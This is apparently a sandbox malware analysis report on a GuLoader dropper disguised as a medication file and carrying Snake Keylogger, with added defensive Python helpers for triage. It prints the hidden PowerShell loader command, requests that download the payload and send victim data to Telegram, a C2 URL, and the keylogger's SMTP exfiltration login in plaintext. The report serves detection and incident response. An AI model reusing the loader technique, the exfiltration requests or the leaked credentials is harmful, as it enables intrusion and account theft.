Windows Analysis Report
Apixaban - August 2024.exe

Overview

General Information

Sample name: Apixaban - August 2024.exe
Analysis ID: 1481493
MD5: 0e198c53ce387336130be0c8ad27b7af
SHA1: ae1762434fbafe22f064eba92398f4c118969efd
SHA256: 53cf1c4a06b8846e9abf3d97f46fa3cd6c50bdf1fe7c46aa64b65960eb456484
Tags: exe, signed

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Apixaban - August 2024.exe (PID: 1632 cmdline: "C:\Users\user\Desktop\Apixaban - August 2024.exe" MD5: 0E198C53CE387336130BE0C8AD27B7AF)
    • powershell.exe (PID: 332 cmdline: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 1372 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
Malpedia references:

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
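The Malpedia note above says the stage GuLoader fetches (here the `yPrtLahZfwrl128.bin` GET seen in the Networking section) is XORed. The report does not contain the key or the decoded stage, so the following is an added, generic illustration of how an analyst recovers a repeating XOR key from a downloaded blob using the known-plaintext bytes every MSVC-linked PE carries in its DOS header ("MZ" at offset 0 and the standard DOS stub at offset 0x40). It is not GuLoader's own decryption routine and not code from this report; the blob, the 7-byte key and the fake PE layout are constructed so the block runs offline:

```python
import struct
from itertools import cycle
from typing import Optional, Tuple

# Known-plaintext bytes found in nearly every PE produced by a Microsoft linker:
# the "MZ" magic at 0x00 and the canonical DOS stub at 0x40.
DOS_STUB_AT_0x40 = (
    b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    b"This program cannot be run in DOS mode.\r\r\n$"
)
KNOWN = {0x00: b"MZ", 0x40: DOS_STUB_AT_0x40}   # offset -> expected plaintext


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; used both to build the constructed blob and to decode it."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_xor_key(blob: bytes, max_len: int = 64) -> Optional[bytes]:
    """Return the shortest repeating key (1..max_len bytes) consistent with every
    known-plaintext position, or None if nothing fits. Each known byte pins one
    key slot (pos % klen); a contradiction rules the length out."""
    for klen in range(1, max_len + 1):
        key = [None] * klen
        consistent = True
        for off, plain in KNOWN.items():
            for i, p in enumerate(plain):
                pos = off + i
                if pos >= len(blob):
                    consistent = False
                    break
                slot, kb = pos % klen, blob[pos] ^ p
                if key[slot] is None:
                    key[slot] = kb
                elif key[slot] != kb:
                    consistent = False
                    break
            if not consistent:
                break
        if consistent and all(k is not None for k in key):
            return bytes(key)
    return None


def looks_like_pe(data: bytes) -> bool:
    """Sanity check after decoding: MZ magic and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed stand-in for a downloaded stage: DOS header, DOS stub,
    e_lfanew -> 0x80, then a PE signature and filler. Not the real payload."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x40:0x40 + len(DOS_STUB_AT_0x40)] = DOS_STUB_AT_0x40
    return bytes(hdr) + b"PE\x00\x00" + bytes(range(256)) * 4


KEY = b"\x5a\x13\xc4\x07\x9e\x2b\x71"          # constructed key, not the sample's
ENCODED = xor_bytes(build_fake_pe(), KEY)      # constructed "downloaded" blob


def decode_stage(blob: bytes) -> Tuple[Optional[bytes], Optional[bytes]]:
    """Recover the key, decode, and return (key, plaintext); plaintext is None
    when the result does not validate as a PE (wrong stub assumption, different
    scheme, or a blob too short to cover the known-plaintext window)."""
    key = recover_xor_key(blob)
    if key is None:
        return None, None
    plain = xor_bytes(blob, key)
    return (key, plain) if looks_like_pe(plain) else (key, None)


if __name__ == "__main__":
    key, plain = decode_stage(ENCODED)
    print("recovered key:", key.hex(), "valid PE:", plain is not None)
```

The DOS-stub assumption is the weak point: a stage built with a non-Microsoft linker or a stripped stub will not match at 0x40, which is why the result is validated against e_lfanew rather than trusted because the key recovery "succeeded". Samples that use a longer or non-repeating key need a different approach.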
Malware configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
Yara matches:
  Source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Source: 00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
  Source: Process Memory Space: wab.exe PID: 1372 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Source: Process Memory Space: wab.exe PID: 1372 | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security

          System Summary

Sigma match (Process started; rule authors: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton):
  Command: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
  CommandLine|base64offset|contains: v,)^
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (ProcessId: 332, ProcessName: powershell.exe)
  Parent: "C:\Users\user\Desktop\Apixaban - August 2024.exe" (ParentProcessId: 1632, ParentProcessName: Apixaban - August 2024.exe)
Sigma match (Network connection; rule author: frack113):
  Image: C:\Program Files (x86)\Windows Mail\wab.exe (ProcessId: 1372)
  EventID: 3, Protocol: tcp, Initiated: true, 192.168.2.8:49728 -> 192.185.142.133:587 (source and destination IPv4)
Sigma match (Process started; rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)): the same powershell.exe process-creation event (ProcessId 332, parent ProcessId 1632) as the first match above.
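The PowerShell stage that the Sigma rules fire on uses a small trick: the whole obfuscated script is read with Get-Content, three characters at a fixed offset inside it are pulled out with SubString, and that three-character string is then invoked with the call operator (`.$Blgekams(...)`) with the script itself as its argument. The cmdlet name therefore never appears on the command line. The following added Python triage helper (not part of the report, and not Joe Sandbox code) parses command lines of this shape, reproduces the SubString step statically against a file, and lists the indicators a detection engineer would key on. The file content is constructed: the report does not show Kompottens.Sub, and that the three characters spell "iex" is an assumption, so the command name is a parameter.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Command line copied verbatim from the process tree of this report (PID 332).
CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$nonrationally=Get-Content '
    "'C:\\Users\\user\\AppData\\Local\\Temp\\forgrovelse\\konstituerendes\\Kompottens.Sub';"
    "$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) \""
)


@dataclass
class LoaderStage:
    path: str       # file handed to Get-Content
    offset: int     # SubString start
    length: int     # SubString length (3 here: room for a cmdlet alias)
    buf_var: str    # variable holding the file content
    cmd_var: str    # variable whose value is invoked with the call operator


# Shape: $buf = Get-Content '<file>'; $cmd = $buf.SubString(off,len); .$cmd($buf)
_LOADER = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*\.\s*\$(?P=cmd)\s*\(\s*\$(?P=buf)\s*\)",
    re.IGNORECASE,
)


def parse_loader(cmdline: str) -> Optional[LoaderStage]:
    """Extract file, offset, length and variable names from a command line of this shape."""
    m = _LOADER.search(cmdline)
    if m is None:
        return None
    return LoaderStage(m["path"], int(m["off"]), int(m["len"]), m["buf"], m["cmd"])


def resolve_invoked_command(stage: LoaderStage, script_text: str) -> str:
    """Static equivalent of $cmd = $buf.SubString(off, len).

    This only works when Get-Content yields one string, i.e. the file is a
    single long line; a multi-line file would produce an array and the call
    operator would not receive a single command name."""
    end = stage.offset + stage.length
    if len(script_text) < end:
        raise ValueError("script is shorter than the SubString window")
    return script_text[stage.offset:end]


def build_constructed_script(stage: LoaderStage, hidden_cmd: str = "iex") -> str:
    """Constructed stand-in for Kompottens.Sub: filler up to the offset, then the
    short command name the loader expects. "iex" is an assumption, not a fact
    taken from the report."""
    return "#" * stage.offset + hidden_cmd + " # remainder of the obfuscated stage"


def loader_indicators(cmdline: str) -> List[str]:
    """Cheap triage checks mirroring what the Sigma hits above key on."""
    hits: List[str] = []
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE):
        hits.append("hidden-window")
    if re.search(r"Get-Content\s+'[^']*\\AppData\\Local\\Temp\\", cmdline, re.IGNORECASE):
        hits.append("script-read-from-temp")
    if re.search(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", cmdline, re.IGNORECASE) and \
            re.search(r"\.\s*\$\w+\s*\(", cmdline):
        hits.append("substring-derived-command-invoked")
    return hits


if __name__ == "__main__":
    stage = parse_loader(CMDLINE)
    print(stage)
    print("invoked command:", resolve_invoked_command(stage, build_constructed_script(stage)))
    print("indicators:", loader_indicators(CMDLINE))
```

On a live host the same SubString step can be reproduced by reading the file the command line names and slicing at the recorded offset; if the file is gone, PowerShell script-block logging (event 4104) records the content that was finally executed, which is the better source anyway.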
No Snort rule has matched.

Suricata alerts (timestamp | SID | source port -> destination port | protocol | classtype):
  2024-07-25T10:04:50.521072+0200 | 2022930 | 443 -> 49707 | TCP | A Network Trojan was detected
  2024-07-25T10:05:28.551868+0200 | 2022930 | 443 -> 49709 | TCP | A Network Trojan was detected
  2024-07-25T10:05:56.111324+0200 | 2803270 | 49710 -> 443 | TCP | Potentially Bad Traffic
  2024-07-25T10:06:00.193954+0200 | 2803274 | 49711 -> 80 | TCP | Potentially Bad Traffic
  2024-07-25T10:06:04.021229+0200 | 2803274 | 49711 -> 80 | TCP | Potentially Bad Traffic
  2024-07-25T10:06:04.608960+0200 | 2803305 | 49713 -> 443 | TCP | Unknown Traffic
  2024-07-25T10:06:05.630649+0200 | 2803274 | 49714 -> 80 | TCP | Potentially Bad Traffic
  2024-07-25T10:06:24.014341+0200 | 2803305 | 49726 -> 443 | TCP | Unknown Traffic


          AV Detection

Source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe | ReversingLabs: Detection: 52%
Source: Apixaban - August 2024.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_277886DC CryptUnprotectData
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_27788EF1 CryptUnprotectData
Source: Apixaban - August 2024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: Binary string: tem.Core.pdb7 | source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 | source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qm.Core.pdbn3 | source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_0040622B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_0040276E FindFirstFileW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp / mov (function: instruction after the nops):
  10_2_0251F33C: jmp 0251F2EDh
  10_2_0251F150: jmp 0251F2EDh
  10_2_0251F804: jmp 0251FAA9h
  10_2_27787B78: jmp 27787EB5h
  10_2_27788FB0: jmp 27789280h
  10_2_2778E148: jmp 2778E416h
  10_2_27782758: jmp 27782A01h
  10_2_27785328: jmp 277855D1h
  10_2_27787720: jmp 277879C9h
  10_2_2778AF18: jmp 2778B1E6h
  10_2_2778CF08: jmp 2778D1D6h
  10_2_27782300: jmp 277825A9h
  10_2_27785BD8: jmp 27785E81h
  10_2_27782BB0: jmp 27782E59h
  10_2_2778B3A8: jmp 2778B676h
  10_2_2778D398: jmp 2778D666h
  10_2_2778F388: jmp 2778F656h
  10_2_27785780: jmp 27785A29h
  10_2_27784A78: jmp 27784D21h
  10_2_2778CA78: jmp 2778CD46h
  10_2_27786E70: jmp 27787119h
  10_2_2778EA68: jmp 2778ED36h
  10_2_27781A50: jmp 27781CF9h
  10_2_27784620: jmp 277848C9h
  10_2_27786A18: jmp 27786CC1h
  10_2_2778EEF8: jmp 2778F1C6h
  10_2_27784ED0: jmp 27785179h
  10_2_277872C8: jmp 27787571h
  10_2_27781EA8: jmp 27782151h
  10_2_2778C158: jmp 2778C426h
  10_2_27780D48: jmp 27780FF1h
  10_2_277815F8: jmp 277818A1h
  10_2_2778C5E8: jmp 2778C8B6h
  10_2_2778E5D8: jmp 2778E8A6h
  10_2_277811A0: jmp 27781449h
  10_2_27783460: jmp 27783709h
  10_2_27780040: jmp 277802E9h
  10_2_2778B838: jmp 2778BB06h
  10_2_27786030: jmp 277862D9h
  10_2_2778D828: jmp 2778DAF6h
  10_2_2778F818: jmp 2778FAE6h
  10_2_277808F0: jmp 27780B99h
  10_2_2778BCC8: jmp 2778BF96h
  10_2_2778DCB8: jmp 2778DF86h
  10_2_27780498: jmp 27780741h
  10_2_2778AC90: mov esp, ebp
  10_2_27786488: jmp 27786733h
  10_2_2778AC8B: mov esp, ebp
  10_2_2778308E: jmp 277832B1h

          Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected (8 requests, 2 of them without the Connection header): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /wp-includes/yPrtLahZfwrl128.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.reap.skyestates.com.mt | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (10 requests, 3 of them without the Connection header): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 times)
Source: global traffic | DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.electromac.com.bo
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 25 Jul 2024 08:06:24 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
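The traffic above is the Snake Keylogger pre-exfil sequence in full: the injected wab.exe first asks checkip.dyndns.org for the egress IP, then resolves that IP to a country via reallyfreegeoip.org, and only then opens its exfil channels (SMTP on 587 to the host from the extracted config, and a Telegram Bot API sendMessage with an empty token and chat_id, which explains the 404 JSON response). The following added Python helper (not part of the report, not Joe Sandbox code) does two things an incident responder wants from this data: it decodes the Telegram beacon URL into the victim fields the keylogger packs into `text`, and it walks a list of network events and flags the lookup-then-exfil pattern plus SMTP from a process that is not a mail client. The beacon URL and the 192.185.142.133:587 connection are taken from this report; the other event rows, the allow-list of mail clients and the pairing of that connection with the mail.electromac.com.bo DNS query are constructed assumptions for the example.

```python
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Beacon URL copied from the Networking section of this report (bot token and
# chat_id are empty in the sample; its config selected SMTP as the exfil mode).
BEACON_URL = (
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544"
    "%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States"
    "%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean"
    "%20the%20system%20storage's%20empty.%20%5D"
)


def parse_telegram_beacon(url: str) -> Dict[str, str]:
    """Split a Bot API sendMessage URL into host, token, method, chat_id and the
    'Key: value' lines the keylogger puts into the text parameter."""
    u = urlsplit(url)
    seg = u.path.strip("/").split("/")              # ["bot<token>", "sendMessage"]
    token = seg[0][3:] if seg and seg[0].startswith("bot") else ""
    q = parse_qs(u.query, keep_blank_values=True)   # percent-decodes the values
    fields = {
        "host": u.hostname or "",
        "token": token,
        "method": seg[1] if len(seg) > 1 else "",
        "chat_id": q.get("chat_id", [""])[0],
    }
    for line in q.get("text", [""])[0].split("\r\n"):
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


@dataclass
class NetEvent:
    image: str      # process image path
    host: str       # DNS name or HTTP Host header, "" if only an IP was seen
    dst_ip: str     # "" where the report gives no IP for the constructed row
    dst_port: int


IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed allow-list; tune per estate

WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
# Constructed event list built from the report's own observations, in the order seen.
EVENTS = [
    NetEvent(WAB, "checkip.dyndns.org", "", 80),
    NetEvent(WAB, "reallyfreegeoip.org", "", 443),
    NetEvent(WAB, "mail.electromac.com.bo", "192.185.142.133", 587),   # Sysmon EventID 3 in the report; host name assumed
    NetEvent(WAB, "api.telegram.org", "149.154.167.220", 443),
    NetEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
             "smtp.office365.com", "", 587),                            # constructed benign row
]


def triage_events(events: List[NetEvent]) -> List[str]:
    """Flag exfil channels and the lookup-then-exfil ordering per process."""
    findings: List[str] = []
    looked_up: Dict[str, bool] = {}
    chained: set = set()
    for e in events:
        proc = e.image.rsplit("\\", 1)[-1].lower()
        if e.host in IP_LOOKUP_HOSTS:
            looked_up[proc] = True
        exfil = None
        if e.host == "api.telegram.org":
            exfil = f"{proc}: Telegram bot API contact ({e.host}:{e.dst_port})"
        elif e.dst_port in SMTP_PORTS and proc not in MAIL_CLIENTS:
            exfil = f"{proc}: outbound SMTP to {e.dst_ip}:{e.dst_port}"
        if exfil:
            findings.append(exfil)
            if looked_up.get(proc) and proc not in chained:
                chained.add(proc)
                findings.append(f"{proc}: external IP lookup followed by exfil channel (stealer pattern)")
    return findings


if __name__ == "__main__":
    for k, v in parse_telegram_beacon(BEACON_URL).items():
        print(f"{k}: {v}")
    for f in triage_events(EVENTS):
        print(f)
```

The per-process ordering matters more than any single host: checkip.dyndns.org alone is noisy, but a process that performs an IP/geo lookup and then opens an SMTP or Telegram channel, while not being a mail client, is a tight match for this family regardless of which exfil mode the build was configured with.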
Source: wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: wab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://electromac.com.bo
Source: wab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.electromac.com.bo
Source: Apixaban - August 2024.exe, 00000000.00000000.1382639575.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Apixaban - August 2024.exe, 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r10.i.lencr.org/01
Source: wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r10.o.lencr.org0#
Source: powershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
